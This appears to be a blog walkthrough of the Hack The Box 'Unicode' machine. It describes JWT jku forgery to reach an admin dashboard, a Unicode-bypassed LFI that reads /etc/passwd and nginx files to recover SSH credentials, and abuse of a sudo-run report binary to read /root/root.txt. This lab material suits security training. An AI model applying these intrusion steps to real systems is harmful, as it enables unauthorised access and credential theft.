In this post, I would like to share a walkthrough of the Unicode Machine from Hack the Box


This room has been considered difficulty rated as a medium machine on Hack The Box

What will you gain from the Unicode machine?


For the user flag, you will use the JWT token to retrieve credentials


As for the root flag, you need to execute the SUID abuse

Information Gathering on Unicode Machine


Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN


Let’s access the website interface to find any vulnerability that we can exploit 


We managed to see only simple page that contain the Home, Login, and Register button on the top of the website


Let’s try to register which we can use to login on to the Dashboard


We should be able to login using the credentials that we created earlier.


Welcome to the Dashboard


There’s upload function but we didn’t get anything after uploading a file


Let’s see the cookies on the website and notice the token is jwt.

JWT information


We should copy-paste the jwt token into JSON Web Tokens – jwt.io


I notice that jku has been stated from the token I retrieve.


For information on jku or jwt, you can read over here


Another information that we can retrieve from the URL we found earlier.


We should do some research jwks generator


As a result, we need to select the options that have been shown above.


Aside from that, we require to change the jku and user value as shown above.


At last, we successfully access the admin Dashboard as shown in the screenshot above.


An error has appeared as “The Report is being prepared. Please come back later” when we try to see the saved reports


There might be some LFI attack methods that can be used over here.


However, the result is not good.


As a result, let’s try to Unicode the symbols to bypass the parameters


The output of /etc/password is shown above.


Let’s do some research on nginx folder


There’s a statement from the database


We got credentials for the reuser “code” and the password for it.


Finally, we should be able to access the machine via ssh


Lastly, we can read the user flag by typing the command “cat user.txt

Escalate Root Privileges Access


For us to be aware of the SUID that we can use for further escalation, we need to run sudo -l command


We should look at the file extension that leads me to LSB executable file


Let’s transfer the file to our own machine to analyze the SUID


However, we cannot read the file content which looks useless to our eyes.


Let’s install the pyinstxttractor on our machine and execute it as shown above.


A new folder has been created from the previous activity.


We also notice that the file format is python 3.9 byte-compiled where we need to decompile it.


As a result, we need to install a python decompiler,


I will skip the explanation above which it also show only installation of the tool


At last, we can finally be able to read the treport file content


Let’s run the SUID “treport” so that we can obtain the root flag


From the code analysis, we can use choice 3 with the next command would {–config, /root/root.txt}